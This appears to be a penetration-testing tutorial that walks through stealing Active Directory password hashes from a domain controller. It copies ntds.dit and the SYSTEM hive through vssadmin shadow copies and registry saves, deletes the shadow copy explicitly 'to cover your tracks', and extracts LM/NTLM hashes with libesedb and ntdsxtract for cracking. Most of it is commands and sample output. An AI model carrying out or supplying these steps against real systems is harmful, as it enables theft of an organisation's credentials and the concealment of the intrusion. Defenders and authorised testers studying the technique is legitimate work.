Extracting Hashes from NTDS.dit File

Once you have privileged access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. We generally prefer to create a new copy so we know it has the latest information, and we can take the relevant files offline for further cracking.  First thing we need to do is get the ntds.dit file, and the SYSTEM file from the Volume Shadow Copy on the Domain Controller.  Luckily Windows has built in tools to assist with collecting the files needed the vssadmin tool.  

We can list the available shadow files by running the following command:

C:\>vssadmin list shadows
# Returns:
vssadmin 1.1 – Volume Shadow Copy Service administrative command-line tool(C) Copyright 2001 Microsoft Corp.
Contents of shadow copy set ID: {xx-xx-xxx-xxx}
   Contained 1 shadow copies at creation time: 6/26/2018 4:26:04 PM

Create a new Volume Shadow Copy of the current drive:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 – Volume Shadow Copy Service administrative command-line tool(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:\’Shadow Copy ID: {xx-xxx-xxx-x-x}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow Copy:

The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOWYCOPY DISK>\windows\<directory>\<File><where to put file>

NOTE: The dot (.) at the end of the copy line will place the file in your current working directory.

NOTE 2: Do not use PowerShell to copy the ntds.dit file.  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

Registry Save

It is recommended getting a current copy of SYSTEM from the registry just in case. There were times where the SYSTEM file from the shadow copy was corrupt.

reg SAVE HKLM\SYSTEM c:\SYS

Delete the freshly created shadows file to cover your tracks:

vssadmin delete shadows /for= [/oldest | /all | /shadow=] [/quiet]

Now that you have the files on your host, it is time to get the hashes.

Utilities needed:

  • libesedb
  • ntdsxtract

libesedb

Download libesedb:

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
#Install the following packages:
apt install autoconf automake autopoint libtool pkg-config
./autogen.sh
./configure
make
make install

Runing esedbexport to extract ntds.dit data:

./esedbexport  -t  <Directory to export data to(.export  will be added to the end)> <ntds.dit file>

EXAMPLE:

# ./esedbexport -t ~/ntds ~/ntds.ditesedbexport 20150409
Opening file.Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:

git clone https://github.com/csababarta/ntdsxtract.git

Usage for dsuser.py
DSUsers v1.3.3 - Extracts information related to user objects

# python dsusers.py <DATATABLE FILE><LINKTABLE FILES><DIRECTORY TO WORK IN> -–passwordhashes -–lmoutfile <LM OUT FILE> –-ntoutfile <NTLM OUT FILE> -–pwdformat john -–syshive <SYSTEM FILE>

(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)

Example Output in JTR Format

# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP -–passwordhashes -–lmoutfile LM.out -–ntoutfile NT.out -–pwdformat john -–syshive ~/SYSTEM
[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC[+] Started with options:
[-] Extracting password hashes[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initializing engine…
[+] Loading saved map files (Stage 1)…
[!] Warning: Opening saved maps failed: 
[Errno 2] No such file or directory: ‘/root/TEMP/offlid.map’ 
[+] Rebuilding maps…[+] Scanning database – 100% -> 40933 records processed
[+] Sanity checks…Schema record id: 1481Schema type id: 10
[+] Extracting schema information – 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)…
[!] Warning: Opening saved maps failed: 
[Errno 2] No such file or directory: ‘/root/TEMP/links.map’
[+] Rebuilding maps…
[+] Extracting object links…
List of users:

(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LNameUser 
principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-xxx
SID: S-1-5-21-350xxx
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:NORMAL_ACCOUNT
Ancestors:$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:name:$NT$2c8f14b9xxx:::name:e4c3436ddd1xxx:::

(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)